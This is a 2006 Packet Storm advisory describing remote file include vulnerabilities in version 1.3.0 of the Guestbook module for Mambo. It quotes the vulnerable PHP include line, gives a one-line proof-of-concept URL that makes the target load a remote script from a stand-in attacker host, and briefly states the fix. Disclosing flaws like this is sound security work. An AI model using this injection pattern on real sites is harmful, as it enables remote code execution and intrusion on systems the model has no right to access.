guestbook130.txt

2006-08-03T00:00:00
ID PACKETSTORM:48755
Type packetstorm
Reporter Matdhule
Modified 2006-08-03T00:00:00

Description

                                        
                                            `---------------------------------------------------------------------------  
Guestbook Mambo Module <== v1.3.0 Multiple Remote File Include Vulnerabilities  
---------------------------------------------------------------------------  
  
Author : Matdhule  
Date : July 27th 2006  
Location : Indonesia, Jakarta  
Critical Lvl : Highly critical  
Impact : System access  
Where : From Remote  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Guestbook Module for Mambo  
  
Application : Guestbook Module  
version : 1.3.0  
  
---------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~~  
  
in folder components we found vulnerability script com_guestbook.php.  
  
-----------------------com_guestbook.php----------------------  
<?php  
  
include($absolute_path.'/language/'.$lang.'/lang_com_guestbook.php');  
  
require ("".$sGuestbookTemplate_."/com_guestbook.php");  
$guestbook = new guestbook();  
  
----------------------------------------------------------  
  
Variables $absolute_path are not properly sanitized. When register_globals=on  
and allow_fopenurl=on an attacker can exploit this vulnerability with a  
simple php injection script.  
  
Proof Of Concept:  
~~~~~~~~~~~~~~~~  
  
http://[target]/[path]/components/com_guestbook.php?absolute_path=http://attacker.com/evil.txt?  
  
Solution:  
~~~~~~~~  
  
Sanitize variabel $absolute_path in com_guestbook.php  
  
  
---------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ solpot a.k.a chris, J4mbi H4ck3r, thx for the hacking lesson :)  
~ y3dips, the_day, moby, comex, z3r0byt3, c-a-s-e, S`to, lirva32, anonymous  
~ bius, lappets, ghoz, t4mbun_hacker, NpR, h4ntu, thama, Blue|Spy  
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com  
~ #n0b0dy (Solpotcrew Comunity) #jambihackerlink #e-c-h-o @irc.dal.net  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~  
  
matdhule[at]gmail[dot]com  
  
-------------------------------- [ EOF ] ----------------------------------  
`